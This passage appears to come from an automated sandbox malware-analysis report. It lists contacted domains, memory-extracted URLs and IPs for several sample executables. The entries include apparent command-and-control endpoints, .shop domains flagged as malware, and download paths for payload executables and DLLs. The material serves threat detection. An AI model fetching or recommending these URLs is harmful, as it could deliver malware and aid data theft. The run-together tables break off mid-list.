                                      http://185.215.113.206/c4becf79229cb002.phpyD100%Avira URL Cloudmalware

                                      Domains and IPs

                                      Contacted Domains

                                      No contacted domains info

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      fancywaxxers.shopfalse
                                        		high
                                        rabidcowse.shopfalse
                                          		high
                                          cloudewahsj.shopfalse
                                            		high
                                            nearycrepso.shopfalse
                                              		high
                                              abruptyopsn.shopfalse
                                                		high
                                                wholersorie.shopfalse
                                                  		high
                                                  http://185.215.113.206/c4becf79229cb002.phpfalse
                                                    		high
                                                    noisycuttej.shopfalse
                                                      		high
                                                      framekgirus.shopfalse
                                                        		high

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        http://185.215.113.206/68b591d6548ec281/softokn3.dllDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/chrome_newtab5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/ac/?q=5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://185.215.113.206/DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.microsoft.co5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://185.215.113.16:80/mine/random.exeD5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.5EfYBe3nch.exe, 00000000.00000003.1771896524.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://fancywaxxers.shop/api925EfYBe3nch.exe, 00000000.00000003.1743404836.00000000014AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    http://185.215.113.206/c4becf79229cb002.phpmTDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    http://185.215.113.206/68b591d6548ec281/freebl3.dllNQMDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe-DownloadingeXbhgU9.exe, 00000011.00000000.2472309641.00000000008D2000.00000002.00000001.01000000.00000011.sdmpfalse
                                                                      		high
                                                                      http://185.215.113.206/68b591d6548ec281/freebl3.dllDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://aka.ms/pscore6lBpowershell.exe, 00000014.00000002.2546675216.0000000005011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://nuget.org/nuget.exepowershell.exe, 00000014.00000002.2567296766.0000000006075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://185.215.113.206/68b591d6548ec281/nss3.dllDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameeXbhgU9.exe, 00000011.00000002.2753387618.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2546675216.0000000005011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://185.215.113.206/c4becf79229cb002.phpETDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc945EfYBe3nch.exe, 00000000.00000003.1774329036.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1772058556.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://fancywaxxers.shop/e5EfYBe3nch.exe, 00000000.00000003.1789147203.00000000014AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    http://www.mozilla.com/en-US/blocklist/DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2299017750.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                                                      		high
                                                                                      https://contoso.com/Iconpowershell.exe, 00000014.00000002.2567296766.0000000006075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl05EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://fancywaxxers.shop/X5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              http://ocsp.rootca1.amazontrust.com0:5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20165EfYBe3nch.exe, 00000000.00000003.1731946940.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731857588.0000000005C5F000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1742606605.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2074769455.00000000053CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.ecosia.org/newtab/5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brDLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2177078368.000000000B741000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe...eXbhgU9.exe, 00000011.00000002.2753387618.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://fancywaxxers.shop/E5EfYBe3nch.exe, 00000000.00000003.1789147203.00000000014AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exeeXbhgU9.exe, 00000011.00000002.2753387618.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://crl.micropowershell.exe, 00000014.00000002.2543676458.0000000003165000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://fancywaxxers.shop/K5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: malware
                                                                                                              		unknown
                                                                                                              https://raw.githubusercontent.comeXbhgU9.exe, 00000011.00000002.2753387618.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://fancywaxxers.shop/api5EfYBe3nch.exe, 00000000.00000003.1789101264.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1743404836.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1785065258.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1794078813.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1837153141.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://support.microsof5EfYBe3nch.exe, 00000000.00000003.1731857588.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://raw.githubusercontent.comeXbhgU9.exe, 00000011.00000002.2753387618.0000000002CD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://fancywaxxers.shop/55EfYBe3nch.exe, 00000000.00000003.1743404836.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1789147203.00000000014AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      		unknown
                                                                                                                      https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/jyidkjkfhjawd.exeeXbhgU9.exe, 00000011.00000002.2753387618.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples5EfYBe3nch.exe, 00000000.00000003.1731946940.0000000005C33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://185.215.113.16/mine/random.exev5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFDLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2177078368.000000000B741000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://185.215.113.206/68b591d6548ec281/vcruntime140.dllDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://185.215.113.206/c4becf79229cb002.phpYDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2294056089.000000000B4FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://185.215.113.206/c4becf79229cb002.php-S0DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                		unknown
                                                                                                                                https://github.comeXbhgU9.exe, 00000011.00000002.2753387618.0000000002C85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://185.215.113.206/68b591d6548ec281/nss3.dllnPmDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                  		unknown
                                                                                                                                  https://contoso.com/Licensepowershell.exe, 00000014.00000002.2567296766.0000000006075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://185.215.113.206/c4becf79229cb002.phpiSDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    		unknown
                                                                                                                                    http://185.215.113.16/mine/random.exeDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://fancywaxxers.shop/apiM5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                      		unknown
                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e175EfYBe3nch.exe, 00000000.00000003.1731946940.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731857588.0000000005C5F000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1742606605.0000000005C58000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2074769455.00000000053CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://185.215.113.206/68b591d6548ec281/sqlite3.dllDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://bridge.lg5EfYBe3nch.exe, 00000000.00000003.1774329036.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1772058556.0000000005C1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://185.215.113.16/L5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://185.215.113.16/mine/random.exeZ5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://github.comeXbhgU9.exe, 00000011.00000002.2753387618.0000000002C97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://185.215.113.206/c4becf79229cb002.php~DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://185.215.113.206onesDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://x1.c.lencr.org/05EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://x1.i.lencr.org/05EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install5EfYBe3nch.exe, 00000000.00000003.1731946940.0000000005C33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://contoso.com/powershell.exe, 00000014.00000002.2567296766.0000000006075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://185.215.113.206/68b591d6548ec281/mozglue.dllDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exeDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exeDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://185.215.113.16/steam/random.exeX5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.all5EfYBe3nch.exe, 00000000.00000003.1759696015.0000000005D2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://fancywaxxers.shop:443/api5EfYBe3nch.exe, 00000000.00000003.1726867792.000000000142D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://www.sqlite.org/copyright.html.DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298331003.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000014.00000002.2567296766.0000000006075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg5EfYBe3nch.exe, 00000000.00000003.1771896524.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.ico5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://raw.githubusercontent.comdeXbhgU9.exe, 00000011.00000002.2753387618.0000000002CD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://185.215.113.206/68b591d6548ec281/msvcp140.dllDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://185.215.113.16/steam/random.exe5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://fancywaxxers.shop/api)5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://github.comdeXbhgU9.exe, 00000011.00000002.2753387618.0000000002C97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://ac.ecosia.org/autocomplete?q=5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://185.215.113.16/5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg5EfYBe3nch.exe, 00000000.00000003.1771896524.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://185.215.113.206DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://185.215.113.206/c4becf79229cb002.phpyDDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://185.215.113.206/c4becf79229cb002.phpion:DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://fancywaxxers.shop/5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1789147203.00000000014AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high

                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                    185.215.113.43
                                                                                                                                                                                                    		unknownPortugal
                                                                                                                                                                                                    		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                    1.1.1.1
                                                                                                                                                                                                    		unknownAustralia
                                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                    216.58.212.138
                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                                    216.58.212.142
                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                                    216.58.206.67
                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                                    104.18.10.31
                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                    74.125.71.84
                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                    		15169GOOGLEUSfalse
                                                                                                                                                                                                    185.215.113.16
                                                                                                                                                                                                    		unknownPortugal
                                                                                                                                                                                                    		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                    140.82.121.3
                                                                                                                                                                                                    		unknownUnited States
                                                                                                                                                                                                    		36459GITHUBUSfalse
                                                                                                                                                                                                    185.244.212.106
                                                                                                                                                                                                    		unknownRomania
                                                                                                                                                                                                    		9009M247GBfalse
                                                                                                                                                                                                    239.255.255.250
                                                                                                                                                                                                    		unknownReserved
                                                                                                                                                                                                    		unknownunknownfalse
                                                                                                                                                                                                    142.250.185.196
